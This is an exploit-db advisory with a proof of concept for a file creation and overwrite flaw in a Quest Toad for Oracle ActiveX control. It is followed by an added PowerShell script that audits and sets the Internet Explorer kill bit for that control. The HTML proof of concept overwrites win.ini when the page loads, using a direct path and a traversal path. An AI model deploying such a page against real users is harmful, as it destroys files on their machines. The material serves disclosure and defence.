Quest Toad for Oracle Explain Plan Display ActiveX Control – ‘QExplain2.dll 6.6.1.1115’ Remote File Creation / Overwrite

  • Author: rgod
    Date: 2012-04-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18703/
  • <!-- 
    Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
    Remote File Creation / Overwrite 
    
    vendor site: http://www.quest.com/
    file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe
    
    CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
    Progid: QExplain2.ExplainPlanDisplayX
    Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
    Implements IObjectSafety: True
    Safe For Initialization (IObjectSafety): True
    Safe For Scripting (IObjectSafety): True
    
    rgod
    -->
    <!-- saved from url=(0014)about:internet --> 
    <html>
    <object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480>
    </object>
    <script>
    try{
    obj.SaveToFile("c:\\windows\\win.ini");
    }catch(e){
    }
    
    try{
    obj.SaveToFile("../../../../../../../../../../windows/win.ini");
    }catch(e){
    }
    </script>
    </html>
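
Added example, not part of the original advisory: a PowerShell audit of whether the control with the CLSID above is registered and whether the Internet Explorer kill bit is set for it, plus a function to set it. The `ActiveX Compatibility` registry path and the `0x400` Compatibility Flags value are the standard IE kill-bit mechanism; the function names are hypothetical.

```powershell
# Added example: audit and set the IE kill bit for the control named in this advisory.
# The CLSID is taken from the advisory; function names are hypothetical.
$Clsid   = '{F7014877-6F5A-4019-A3B2-74077F2AE126}'
$KillBit = 0x400   # Compatibility Flags value that blocks instantiation in IE

# Native and 32-bit-on-64-bit registry views both need the flag.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Test-ControlRegistered {
    # True if the COM class is registered in either registry view.
    foreach ($p in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID') {
        if (Test-Path -LiteralPath (Join-Path $p $Clsid)) { return $true }
    }
    return $false
}

function Get-KillBitState {
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent (e.g. 32-bit OS)
        $key   = Join-Path $root $Clsid
        $flags = 0
        if (Test-Path -LiteralPath $key) {
            $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
        }
        [pscustomobject]@{ Key = $key; Flags = ('0x{0:X}' -f $flags); Killed = [bool]($flags -band $KillBit) }
    }
}

function Set-KillBit {
    # Requires an elevated session; preserves any flags already present.
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $key = Join-Path $root $Clsid
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        $cur  = if ($prop) { [int]$prop.'Compatibility Flags' } else { 0 }
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value ($cur -bor $KillBit) -Type DWord
    }
}

"Control registered: $(Test-ControlRegistered)"
Get-KillBitState | Format-Table -AutoSize
# Set-KillBit   # uncomment to apply, then re-run Get-KillBitState
```

With the kill bit set, Internet Explorer refuses to instantiate the control even though it is marked safe for scripting and initialization.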